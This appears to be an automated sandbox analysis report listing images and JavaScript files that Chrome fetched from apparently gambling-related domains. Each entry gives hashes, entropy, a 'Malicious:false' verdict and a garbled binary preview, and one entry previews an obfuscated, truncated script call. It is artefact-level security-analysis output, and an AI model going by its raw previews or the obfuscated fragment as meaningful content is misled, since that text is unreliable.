                                                                                                                                                          Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...#iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.1 (Windows)" xmpMM:InstanceID="xmp.iid:FF0FA858998711EA979AE2BEFA1347C0" xmpMM:DocumentID="xmp.did:FF0FA859998711EA979AE2BEFA1347C0"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FF0FA856998711EA979AE2BEFA1347C0" stRef:documentID="xmp.did:FF0FA857998711EA979AE2BEFA1347C0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>B....../IDATx......5|*t.==..H..sD"..6...5.......^.`...0....d.D.@..Y..g:.T.{oM..eq`.]...y..tWUW.{.y....8..M|._W
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 80 x 80, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4651
                                                                                                                                                          Entropy (8bit):7.954180682274166
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:hk8M2lWN7NUStd/PfVXIvoEK8VY8e0Z6hVOToPHjHfe3T8D4L2XqoEPB7yOm:qt2lMRTd/HltH7l0MHZuT8LXJEPEf
                                                                                                                                                          MD5:2B84AE38807F00637C81261A986BC437
                                                                                                                                                          SHA1:96BFB55BBFFDD89D398A684B781038CE927B3069
                                                                                                                                                          SHA-256:5AD1A8378BC69DA9F584E40F971D21DBD372A23EE57AC84678CF9FFCDFE48696
                                                                                                                                                          SHA-512:1E8E62422E94A56C701B37E29579D3165FF116B150D1F1CCCB2C4372800BA7FDDA880A4E35ED2F1A30CC36329FEB61FA16A1BF0439C3F5A05002AB185DD25A28
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/lotto/lottery_2001.png
                                                                                                                                                          Preview:.PNG........IHDR...P...P.............PLTE......F....>..B..L..C..*..@.....{.$..2..V.....=..=.....'..'...|.)..C..P...}....q..!..%..3.....).....&y..I.._.'|..b..a.W..$v..L.W..)...o.'...Y.q...j..^.l..)...X..\.....m..W.H..'..%...c.,...q..m..g.+...f..S..B.,..k..U..V..Z..Q.."...Q.)..+.."...h.e...\.X...<.X..&..+.. m..c..W..T../x......%..L...\..Z..^..L.g..X..`..#...t..c..^..i..O....g.....+..2..%..&x..b..6|......\.....E..'..6.............)..<..6...z.=v..X..:..4.M.....Q..^..@..4..c...X..P..D..M.*.......A..#...`....._..S..G..C.)...i.Z..Z~..C..J..;....>..'..B../...|..c..q.^..*..:..L..b..D...z..o..h..P..B....[..F..%..R..K.......b.. ..-w.\.....N..q....L.....0r...5.....i..U.....5d....y..B..;.....w..m...k."v.;..<{..i....u..b...m.>q.......`....."^....Q......u.t..R...N...gG...U.."u...x......o.|..&d.....&d..]hx1Q...!tRNS... .x..XS......_.......zvV.N.2..]....IDATX..k.@...X./....b.4....CA..4....hh<z(.U(.V..G..EH..!x..F.<dI3......[...}'..N...w.....tkO.'....MAY*.H...#.....i.|..MS.....d.E..I
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1123
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):737
                                                                                                                                                          Entropy (8bit):7.7010196580157615
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:XSUaOSJrDTsaz7ZWrp7znWGS/2doWUPWnFQGpidn4oyauUDG/o4vo+vXr:XSUNSJrkaz7ZWrp7zWf/xWUyidnVDpHc
                                                                                                                                                          MD5:F437E6C6841C0B7CAD59396FCB927999
                                                                                                                                                          SHA1:A438B087019259B6ABB6EEC6164821CC73B18373
                                                                                                                                                          SHA-256:8246452F3842E7788DDA237BE9E99E42BA4223FAC48456E27A436B87CF0026C0
                                                                                                                                                          SHA-512:B374266F09D9C33C197FF3AD21C1CF12B32E88493DB3C7B6D9FEA64D9B0823C49A049B022150A311E35DC1A00DB770831FA8BE56D0BB474327F3A36BCFFF3C46
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:..........\.OO.1...~..\vI....e...@.A.a9(!....v.c.aY....Cb4&...&..".iX.o..av]l......m...o#..@S..ED.].s.5......X."."..s,5c.[..m...pp`Md.iUC..D!.xk{..r."..)..2...I..Q.. M..1`..8...I......Q..R..=..Ej.1.Z.dz.w.TD.Je..|.Q.^T.H*].3..<....>..."..4..=&PD..SSj.fH...[.rE.n.XHR-...g.}.#......p...f....K+.V.*%^~V+..D..~......8.~....^C......P....Q..d..c..!J U...fh`.0Y..Y...D.3..S../a.ad,.A.S..:d.pp.>..dv..96UO.m.." 'ZS.(....;...8.0..M..H(o%cq.t.......v...LH](&..@...H.*.1N.4`.r........OW?~.../~../8..,.J...."w)&...q.t......6\.s..G.d.....$...n..s.e....k...X..2.g.|<c.W.k..!h.a8......{..0WEZ.M53)....^}.8......V..5....ZL...|.NR.+.|.s.n-.C...N....M...........................Q...@r!Sdn.I............Zc...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 36 x 37, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2164
                                                                                                                                                          Entropy (8bit):7.4927303381860115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:4ANn2N9/MJ39EggZ4Wkx/vlo7RKaRoLyeWlGMI6Yds:B2//8EggZ5ktv67DR9IBs
                                                                                                                                                          MD5:19E70F056D36490F5E8A1741F389D75E
                                                                                                                                                          SHA1:641064D7DA3FFC885424570E32EA9E1E972AFDED
                                                                                                                                                          SHA-256:FEDC19B12329A41B5B95CB9A351F95D9884A8AA88AD59C3B497A8F241550B219
                                                                                                                                                          SHA-512:2EB54B7287055AD2FC2556D102A16C013BF0EF21C54F5593AB6FC4133548F1B02EF0AD26C5EA19BEB2CCCA0E1924BC66679186DCDD1AB677833413170EC222BD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/index/383/footer/icon2.png
                                                                                                                                                          Preview:.PNG........IHDR...$...%......>.j....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:4BAA211450A511E7AE36B7CC5EC786C8" xmpMM:DocumentID="xmp.did:4BAA211550A511E7AE36B7CC5EC786C8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4BAA211250A511E7AE36B7CC5EC786C8" stRef:documentID="xmp.did:4BAA211350A511E7AE36B7CC5EC786C8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>-.G.....IDATx.W[S[U.NNN ...$...BB..@.j...Z.v|..._._}.._..p...O.}p$UpF.RH..$.p....C..r."..$...z8...}Y.[.b.7.X.Fr8
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 263 x 262, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17624
                                                                                                                                                          Entropy (8bit):7.961614448405698
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:LlGu9DcD0glOL8a4paq6dArwR/rjzySZIJ9M9JQEZBk:gu9DcYgwKaq6myXzj6gDQE0
                                                                                                                                                          MD5:16872E229AF894533A44030600391226
                                                                                                                                                          SHA1:8FE28588BB2F0CACA290DC09ED6EFE32B86ABB33
                                                                                                                                                          SHA-256:4B78F9508173A55374FA3084901F3CC0ED0866630B3D9A943EB01CBA2DF9DD6C
                                                                                                                                                          SHA-512:6F12B8AC6A26E2A01352F1674F8FD8C878FBE25E9C6E0B3489AE82B97DB166CDA51030846E439EDDA03C4C221D9417F75AF3D2AE70E2F50DF88D5AC94BB41CEC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............h.P.....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.6 (Macintosh)" xmpMM:InstanceID="xmp.iid:A690DA76239111EEAB34E7F8E7762A7C" xmpMM:DocumentID="xmp.did:A690DA77239111EEAB34E7F8E7762A7C"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B1236A6B237811EEAB34E7F8E7762A7C" stRef:documentID="xmp.did:B1236A6C237811EEAB34E7F8E7762A7C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>:w8...AFIDATx..}k...y.o.q..9....c7....c.J1!q.'NI....VV...B....@.*.."....BT.".....@.?.m....EM.M.'.!vb'Nb.'.]..\.=>
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):45166
                                                                                                                                                          Entropy (8bit):7.990234874518714
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:Mwd07uKcOmE+VKm6KOl53uyn5/3h4lJTjpUaWJ502amISF:MIVEZm6KOlN75/GbP2aWJ502amISF
                                                                                                                                                          MD5:D2DC7C733BFBE1F9CFEFC7C74F923735
                                                                                                                                                          SHA1:5BB30C2D07BF14B5E0293E3BD40EC30FFE61CB07
                                                                                                                                                          SHA-256:5CD1444248DD9233E02C89BBC5EEE082D5D8A1980263A3312E67B5EFF6BBF4E4
                                                                                                                                                          SHA-512:FB12907A3303032DFECDB4ACFAB59C72FD5069861A9B8F5DD54571AE4359321A8601953803F4135EBB1DE1535A70CE23AD262B212C7EB920E5C53A227E4AA55E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/sports/01.png
                                                                                                                                                          Preview:.PNG........IHDR.............ua.....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:4F2390D393A611EC97F8AE54E632C5A7" xmpMM:InstanceID="xmp.iid:4F2390D293A611EC97F8AE54E632C5A7" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4B70E39BCDEB11E9AE98C341B6C88BB3" stRef:documentID="xmp.did:4B70E39CCDEB11E9AE98C341B6C88BB3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...)....IDATx..}.|\W.......f..-7.;.v.b..B...IH.......R.eY.,KI..!=..8q..5.K.d.>......7.y.L.e....Xo.~.{.w...Z.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5462
                                                                                                                                                          Entropy (8bit):7.8710343009050785
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:mYzFTu2hg6UAbYDwRIszTWnYruu8BnPmIONO8afibnNfZhsEYHwLG7EmDrR30Ldz:n68YS5zTWKu+hZZsOyAWqz
                                                                                                                                                          MD5:3EBD27BB1ACC6B4BD0817AC44C5D5E6D
                                                                                                                                                          SHA1:65542A38BF07E95C83B65610CE8D2CCA8163439B
                                                                                                                                                          SHA-256:90F493A83290D15AEE482D1B239B0277B7743DF843FE94D0AFB06D9BC3ED4E3F
                                                                                                                                                          SHA-512:B1B9FA8F8358A0574859927E978CD21491E46D9854604BA380BD57DC98098FAA2CE66525DCA03B19E498B942513420C207EB8D133EF272FCA006DA9299B1B464
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/card_ky.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:08361303F77811E8AE71AEF0D532570E" xmpMM:InstanceID="xmp.iid:08361302F77811E8AE71AEF0D532570E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c5537c56-d66b-9f4a-95f4-82eac84c99bc" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......vIDATx..Z.p\.y..c..C.+i%...-.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15676
                                                                                                                                                          Entropy (8bit):7.95677851421634
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:trkksoIK3AL/H1VPrpeCm4uR72goHW11m71bmrvF:trDI0eH1VFeCm4E7IW14YrvF
                                                                                                                                                          MD5:E9D6F1F9FE9BD1A84D160111A694055B
                                                                                                                                                          SHA1:CAEAA79A384502FB99A1ECDC935F484415C025F7
                                                                                                                                                          SHA-256:2D45AA957F5D5C9D8B607977301737CBEC92E1A5BC21EA5C52001E3DC71796E3
                                                                                                                                                          SHA-512:9E044E7AC8DA66289449E26DF7FE3DA44739B37CBBCE9103061750D1760131F9C2297A9DE6FE22869FE16557A283C2EC86676DC312C06A240D6C4AF371FDE973
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:6D4B3F368D5911E7A155C2C7373E56B1" xmpMM:InstanceID="xmp.iid:6D4B3F358D5911E7A155C2C7373E56B1" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15093
                                                                                                                                                          Entropy (8bit):7.9524351565226485
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:TpDmpvlG/p2S5debP9KQ3nlAd8LLf2aM77qh1HAdysV:TFA0p2i8A8aaM7eh6dyS
                                                                                                                                                          MD5:46C57C51B8DF1740D25BBABBAADA22A5
                                                                                                                                                          SHA1:AFC3B7126B10FF529F254D0445532E57DF189479
                                                                                                                                                          SHA-256:ABB838D5A5AF338C8A792C810C027E8723AC2499A2D5FD3A69E8FEA5AF5A7101
                                                                                                                                                          SHA-512:F5FD8851D65813989D798F464F50FDBC20B76470189CF7DF26CC3B1B983EC0486CE39C4BD108D315EA02ADE80E307B4133B20BA3E9D211F04C6BCBFF7EC657A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/ag_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:6D4B3F328D5911E7A155C2C7373E56B1" xmpMM:InstanceID="xmp.iid:6D4B3F318D5911E7A155C2C7373E56B1" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (4332), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4332
                                                                                                                                                          Entropy (8bit):5.932576556190772
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:VW1cmpFte1myUMxfZuL29BZMcUjzcqmzPedV2mePyQTnRXxZU2pO:VW6mCmMjP9eSazLQjRXxZU2pO
                                                                                                                                                          MD5:99CD2D57D8C12FFD2464BFA3EB6D35D9
                                                                                                                                                          SHA1:A884CB0844338E03F738E6B6A1338898C13C4B96
                                                                                                                                                          SHA-256:9D8D6EF3E24D7F2269BCEF7D5C2E08817E7F447BA9AFAA01677AA27415B387CD
                                                                                                                                                          SHA-512:AA251EA8D0BE673AF1947C49FB9652938B28282CAAB4FB37795DA23646A844703ABC9DA2371DFB2B029B4E6B5EFFF5D3E6BADA3ADE454CA25F78C1E77718B464
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/components/121/views/home/indexContent.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjABgDZCBdAGgG8UAbAMVoC4AzAVzRgBcBLdTDspGSgBKCgCIWSEAAIkHAE5dOYgNwB5MACsQnAHQATEEy5oQABXkoIIeRwCemQWID6zkEgCyKfS2ogxlABuUNQsIAwAhPgAvsIqwfLSaAC8UJhi+DAQTGLCZCDJmGliZggAFgCsuULpHgAsTLTVFDAoALYQ6CBoHEgMLe0QAIryAMLeIAAS7eGs7Ny8ovIgHCzyaNJQuiCYAEwAnADMwrocZd1FumAm+phovtRkYgBCAJoAkly5wtHRZPpQDhQZhsTg8NCYJYrNZoFr6NBmQFlBhoAxGKC+Di6cZoORQHq6GDw6ZyMhcNoAcwYYgCNxAAA8cRxuhxqQEwBw0O9Wmg2WQKVA2iBnih6XzmfSOAAVKwMbDkOTyAByLDafLa3nubVwDHwZA1+l2ozUSqlOvl/LYuClKIelrQuxt92ojwFQoAIoDgRaYGtlj1qR4AOIBDXXPzulDAXkWiCWDXM20u376lZlbx9CgUti7AAyIPm4MhFDOXCQumzDo8kL+ldwAFEC2DFi0/FB5O8ejZgtQ+GUyxWrVKfvbdo25s2IaIYG2O135D2+wPK46RyuPE2FlOKAlpBxktB5FJOxxMAASdK6NpQACOYRkvlyuk6SC4W8hpyscVL5ZXUuSUgcCe3YhJgE7vqIHAADwALS7HU+AAGSIXwyT4HkF5iFet73tIj4nDASBIJgJayhwMEwbEfwISOBq7FqUD6Pom5FqIu77j+KiAcBC6geBrE7u2sjJB4SK6Ew1AoCg8iYBU+zyfsABUolnLo8j4vo7SQgA1Lg35Xpqqq4NpAEAPQEHqWKKiqbTJFiWq0BCWIGlqel/LgIDHH8Dm8vxvAcKIfBQR5ADsAA+YUcAAfB5AAcwjIahuCHHUuy4BUdQhXEu5IHZn60Fw9IgLcuwnEgEDUG+l65CoyyrOssjYP
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 265 x 110, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):25015
                                                                                                                                                          Entropy (8bit):7.980690323700889
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:HoPQbfTZUOVEdf0OBPX+CQW9wjdwKjwKJkNfXJ7u:Hk+NUn/gCryjvqJu
                                                                                                                                                          MD5:BC1F4F5F63370611E1D02DB6965C322E
                                                                                                                                                          SHA1:A8E81128DD3A20903E8B86218B71423DB1836F2A
                                                                                                                                                          SHA-256:752255E2AF92BF5C380D5A5F53D7667A0303A9760362EED4ADA8EA027B5154BA
                                                                                                                                                          SHA-512:7915CE1F9A0424A688C7465C7EAE6F61A197CB3CC5C5B3AE694810BA61526E329F6C47E4D0BA0F3046881FD93080584F3C9D1FA726211A5663146F26C61D5CB1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.......n.....4..2....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:da81c61b-551b-4bf2-9f22-ed39bb7c336b" xmpMM:DocumentID="xmp.did:EF2B064C1E2D11EEA737E951EC38508F" xmpMM:InstanceID="xmp.iid:EF2B064B1E2D11EEA737E951EC38508F" xmp:CreatorTool="Adobe Photoshop 24.6 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2662a110-a5c3-4818-8e4c-a76e6f5e550f" stRef:documentID="adobe:docid:photoshop:5a7091ea-5cf8-ec4b-8d07-c87cf5230b9d"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..6..].IDATx..}....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 334 x 81, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):10381
                                                                                                                                                          Entropy (8bit):7.961677163246217
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:hSHIIHUCD4wayevD7qnQtT568cWT5V32KMTYV80N28yoDqrN:I50wlGfqnQtT568xiKH8loGrN
                                                                                                                                                          MD5:D52EA92CA7AA5D073B53FC366142A740
                                                                                                                                                          SHA1:06FF0B6AB821A27293EDE8A5B2704A8C80275237
                                                                                                                                                          SHA-256:1DB58C93AFC32FF6EC3B0C3A1087C442CC7F67B31F19BF63BDA4076DBF0C38FF
                                                                                                                                                          SHA-512:02233D0E2015769302CC3BDA5CE45E6A482418B8A9A2CA086D2DDC0D24FE81261966D49E442131059C8FE67EBC6744714DDE7C199620AB7CDA93BA98BBFD8A93
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/6efc250fa2d2248025dd908007f87d44.png
                                                                                                                                                          Preview:.PNG........IHDR...N...Q.....2.......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):151324
                                                                                                                                                          Entropy (8bit):5.961896786964676
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:VD6KReWP4vtuGy4eSm0zapcJJUfyXx3O4/wLyrXk66RC0s:VD6KMKUuAFmwapcJJUfyXxeerXk6QC0s
                                                                                                                                                          MD5:CA7749BA7912EB65B729E869BB83ACD9
                                                                                                                                                          SHA1:4CE57A051731944EAD05072DCE1F47EAE7787170
                                                                                                                                                          SHA-256:DB3F625270BDB9B6EC85570C242CB9FE63D0ECBEBF003F5E043A5AFADD03BC96
                                                                                                                                                          SHA-512:05DB56552FFBF63C9D8D7061BFB13A7FD7A937BBC52BBA33C19DACBD47DB95A958B482FF47B696712F3915D49E7A4BFF4679E1508ED0ACB8A019E20D9413E8E4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/vendor.js
